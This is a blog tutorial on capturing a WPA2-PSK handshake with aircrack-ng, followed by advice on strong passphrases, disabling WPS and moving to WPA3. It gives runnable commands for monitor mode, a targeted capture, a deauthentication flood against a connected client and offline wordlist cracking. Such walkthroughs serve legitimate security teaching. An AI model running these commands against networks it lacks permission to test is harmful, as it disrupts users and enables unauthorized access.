*ARGS.TECH | BLOG | Understanding WPA2-PSK handshake attacks (and how to protect your WiFi)
BLOG

Understanding WPA2-PSK handshake attacks (and how to protect your WiFi)

An educational look at how tools like Aircrack-ng test WiFi security and why strong passwords (and WPA3) are critical.


A note on ethics and legality (from the author)


I am writing this guide for educational and network testing purposes only. Using these techniques on any network without explicit, written permission from the owner is illegal in most countries.


I, Shakhzhakhan Maxudbek, am demonstrating this process purely to highlight a well-known vulnerability in WPA2 and to show the importance of proper security measures. My blog, args.tech, does not condone any illegal activity.


Always ensure you are testing on a network you personally own.


Introduction: What is aircrack-ng and what is a handshake attack?


Aircrack-ng is a complete suite of tools for auditing and assessing WiFi network security. It's the gold standard for wireless penetration testers and security enthusiasts.


In this guide, I'll demonstrate one of its most common uses: attempting to capture a WPA2 4-way handshake.


What are we doing? We are not "hacking" the WiFi password in real-time. Instead, our goal is to "listen" to the wireless traffic and capture the encrypted 4-way handshake. This handshake is the short conversation that happens when a device (like your phone) connects to a WPA2-protected router.


Why does this attack work? The WPA2-PSK protocol is vulnerable because this captured handshake can be saved to a file. Then, using an offline attack (on our own computer), we can try to "crack" it by guessing the password. Our entire goal today is just to get that handshake file.


Step 1: Prerequisites & setup


Before you begin, you will need two things:

  1. A computer running Linux (like Ubuntu, or a specialized OS like Kali Linux).
  2. A wireless adapter that supports monitor mode and packet injection. (Most built-in laptop cards do not support this. USB adapters from Alfa, TP-Link, or Panda Wireless are popular choices).


First, let's update your system's package list:

xinit@localhost:~$ sudo apt update


Now, install the aircrack-ng suite:

xinit@localhost:~$ sudo apt install aircrack-ng -y


Step 2: Finding your target (reconnaissance)


Enable monitor mode


First, we must put our wireless adapter into "monitor mode." This allows the card to listen to all WiFi traffic in the air, not just the packets addressed to your computer.


Find the name of your wireless adapter:

xinit@localhost:~$ iwconfig

You'll see an adapter listed, usually wlan0 or wlan1.


Now, start monitor mode using airmon-ng. (Replace wlan0 with your adapter's name).

xinit@localhost:~$ sudo airmon-ng start wlan0

This command will create a new virtual interface, often named wlan0mon. This is the interface we'll use from now on.


Scan the airwaves


Now, let's scan for all nearby WiFi networks using our new monitor interface:

xinit@localhost:~$ sudo airodump-ng wlan0mon

airodump-ng will display a list of all Access Points (APs) it can see.


Look for the network you have permission to test. You need to write down two pieces of information:

  • BSSID: The MAC address of the router (e.g., 00:1A:2B:3C:4D:5E).
  • CH: The channel the network is on (e.g., 6).

Press Ctrl+C to stop the scan once you have your target's info.


Step 3: Capturing the WPA2 handshake


Focus on your target


Now we run airodump-ng again, but this time, we focus only on our target network. This makes the capture much cleaner.

  • --bssid: Sets the target router's BSSID.
  • -c: Sets the channel.
  • --write: The prefix for the output file where the captured data will be saved.


Run airodump-ng with these filters, replacing the BSSID and channel with your target's:

xinit@localhost:~$ sudo airodump-ng --bssid 00:1A:2B:3C:4D:5E -c 6 --write captured_handshake wlan0mon

airodump-ng is now listening and will create files like captured_handshake-01.cap.


Now, we wait. We need a device to connect (or re-connect) to the network. When it does, airodump-ng will "see" the handshake. You'll know you have it when this message appears in the top-right corner:

WPA handshake: 00:1A:2B:3C:4D:5E


Speeding up the process with a deauthentication attack (optional)


If you don't want to wait for a device to connect naturally, you can force a connected device to disconnect. This will cause it to immediately try to reconnect, giving us the handshake.


This is an active Denial of Service (DoS) attack.


In the airodump-ng window, look at the STATION list at the bottom. This is a list of clients (devices) connected to the router. Pick one (e.g., AA:BB:CC:DD:EE:FF).


Open a new terminal and use aireplay-ng to send deauthentication packets.

  • --deauth 10: The number of deauth packets to send.
  • -a [BSSID]: The BSSID of the Access Point (router).
  • -c [STATION]: The MAC address of the client device you are kicking off.


Send the deauthentication packets (replacing BSSID and STATION MAC):

xinit@localhost:~$ sudo aireplay-ng --deauth 10 -a 00:1A:2B:3C:4D:5E -c AA:BB:CC:DD:EE:FF wlan0mon

Watch your first airodump-ng window. Within seconds, you should see the WPA handshake: ... message appear.


Once you have the handshake, you can press Ctrl+C in both terminals.


Step 4: The "crack" (the offline part)


You now have a .cap file (e.g., captured_handshake-01.cap).


This file does NOT contain the password. It contains a cryptographic proof that a client knew the password.


The "crack" is an offline brute-force attack. We use a wordlist (a giant text file with millions of potential passwords) and see if any of them match the handshake.


This is how the aircrack-ng tool works:

  1. It takes the first password from your wordlist (e.g., password123).
  2. It runs the same cryptographic function as a real router, using that password.
  3. It compares the result to the encrypted proof in your .cap file.
  4. If they match, the password is found.
  5. If not, it moves to the next password and repeats.


The command would look something like this (we won't go into detail here): aircrack-ng captured_handshake-01.cap -w /path/to/wordlist.txt


The success of this attack depends 100% on two factors:

  1. The quality of your wordlist.
  2. The weakness of the target's password.


How to protect your WiFi network


This is the most important part. How do you make this entire attack useless?

  1. Use a Long, Complex Passphrase. This is the single most effective defense against a handshake attack.
    • Bad: P@$$w0rd123! (This is in every wordlist).
    • Good: My-Blue-Car-Eats-Green-Grass-! (This is in no wordlist). A brute-force attack against a 20+ character passphrase made of random words would take centuries. Length is more important than complexity.
  2. Disable WPS (Wi-Fi Protected Setup). WPS is the "push-button" feature on many routers. It has a separate vulnerability (like the Pixie-Dust attack) that can allow an attacker to get your password in seconds, completely bypassing the handshake attack. Log in to your router's admin page and disable it.
  3. The Real Solution: Upgrade to WPA3. The entire attack I just described is a flaw in WPA2. The WPA3 protocol (released in 2018) fixes this. It uses a new authentication method (called SAE, or Simultaneous Authentication of Equals) that is not vulnerable to offline dictionary attacks. Even if an attacker captures a WPA3 handshake, they cannot use a wordlist to crack it.
    • Action: Check your router's settings. If it supports WPA3, enable it (often called "WPA2/WPA3" mode). When buying new WiFi equipment, ensure it is "WPA3 Certified."


Conclusion


Aircrack-ng is a powerful tool for demonstrating a fundamental weakness in WPA2-PSK: the authentication handshake can be captured and attacked offline.


The primary defense against this is using a long and unpredictable passphrase (20+ characters is a great start). The ultimate solution is to move to WPA3, which completely mitigates this attack vector.

Top button